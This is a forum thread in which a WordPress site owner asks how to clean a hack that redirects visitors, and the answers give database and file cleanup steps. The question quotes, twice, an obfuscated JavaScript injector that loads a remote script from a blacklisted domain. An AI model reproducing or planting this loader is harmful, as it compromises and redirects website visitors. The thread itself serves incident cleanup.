How to solve wordpress redirection hacks attacks?

Question

My website https://spicecarts.in just now got hacked! It is redirecting to other sites! I checked with this tool https://sitecheck.sucuri.net/results/https/spicecarts.in and found the errors 1.Known javascript malware: malware.injection?35.27

Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,97,108,108,111,119,46,108,101,116,115,109,97,107,101,112,97,114,116,121,51,46,103,97,47,108,46,106,115,63,100,61,49);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

Redirects to https://spicecarts.in/

2.This page includes a JavaScript/iframe from letsmakeparty3.ga that is blacklisted by Sucuri Labs, reason: injected script, see https://labs.sucuri.net/?blacklist=letsmakeparty3.ga

https://allow.letsmakeparty3.ga/request?Type=api&query=034/wp-content/plugins/super-progressive-web-apps/public/js/register-sw.js

3.In https://spicecarts.in/wp-includes/css/ malware found as below

Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,97,108,108,111,119,46,108,101,116,115,109,97,107,101,112,97,114,116,121,51,46,103,97,47,108,46,106,115,63,100,61,49);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

How to solve this!

Answer 1

Hi y found and delete virus in the database.

Juste chearch the caractère base 64 encoded in the database in the table option.

decode any information base 64 and delete this.

Answer 2

First, calm down. My website has suffered the same SQL injection attack and here's how I solved it. Make sure to backup your database first.

1. Go to your phpmyadmin and open wp_options table. Update the option_value of siteurl and home with the url of your website's url without / at the end, example https://yourwebsite.com. After updating, you are now able to login to your website.

2. Login to your website and delete the transient options you can use wp-optimize plugin to delete the transient options like these:

3. In conclusion, what you need to do is to clean your database. There are plugins that can do such cleaning. You may also search your database for letsmakeparty3 and remove these.

Answer 3

You will also want to be sure that any potential malware on the site is cleaned. You can either submit the site for cleaning to a professional service or try to do it yourself. As mentioned above, you will need to clean the DB. You will also need to check for infected files. If you have a clean version of your theme and plugin files stored in a backup or on your local machine, that could be a good place to start. Make sure everything on the site is updated (outdated plugins usually = vulnerability). If it's redirecting to letsmakeparty3, then it's worth checking to see if the MU plugin rms_unique_wp_mu_pl_fl_nm was added to your site. Cheers!